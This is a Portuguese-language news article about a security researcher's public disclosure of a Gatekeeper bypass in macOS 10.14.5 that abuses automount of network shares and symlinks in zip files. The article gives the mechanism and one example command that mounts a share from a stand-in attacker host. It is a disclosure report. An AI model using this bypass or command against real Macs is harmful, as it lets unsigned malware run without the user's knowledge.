Anúncio fechado

O pesquisador de segurança Filippo Cavallarin postou um aviso sobre o bug no macOS 10.14.5 em seu blog. Isto consiste na possibilidade de contornar completamente as medidas de segurança do Gatekeeper. Segundo Cavallarin, ele apontou o erro para a Apple já em fevereiro deste ano, mas a empresa não corrigiu na última atualização.

O Gatekeeper foi desenvolvido pela Apple e incorporado ao seu sistema operacional de desktop pela primeira vez em 2012. É um mecanismo que impede a execução de um aplicativo sem o conhecimento e consentimento do usuário. Depois de baixar um aplicativo, o Gatekeeper verifica automaticamente seu código para ver se o software está devidamente assinado pela Apple.

Em sua postagem no blog, Cavallarin afirma que o Gatekeeper, por padrão, considera o armazenamento externo e os compartilhamentos de rede como locais seguros. Qualquer aplicativo que resida nesses destinos pode, portanto, ser iniciado automaticamente sem a necessidade de passar pela verificação do Gatekeeper. É esse recurso que pode ser explorado para lançar software malicioso sem o conhecimento do usuário.

Um aspecto que permite acesso não autorizado é o recurso de montagem automática, que permite aos usuários montar automaticamente um compartilhamento de rede simplesmente especificando um caminho começando com "/net/". Como exemplo, Cavallarin cita o caminho “ls /net/evil-attacker.com/sharedfolder/” que pode fazer com que o sistema operacional carregue o conteúdo de uma pasta “sharefolder” em um local remoto que pode ser potencialmente malicioso.

Você pode observar como a ameaça funciona no vídeo:

Outro fator é o fato de que se um arquivo zip contendo um link simbólico específico que leva à função automount for compartilhado, ele não será verificado pelo Gatekeeper. Dessa forma, a vítima pode facilmente baixar o arquivo malicioso e descompactá-lo, permitindo que o invasor execute praticamente qualquer software no Mac sem o conhecimento do usuário. O Finder, que oculta certas extensões por padrão, também tem sua parcela nessa vulnerabilidade.

Cavallarin afirma em seu blog que a Apple chamou a atenção para a vulnerabilidade do sistema operacional macOS no dia 22 de fevereiro deste ano. Mas em meados de maio, a Apple parou de se comunicar com Cavallarin, então Cavallarin decidiu tornar tudo público.

kit localizador de mac

Zdroj: FCVL

.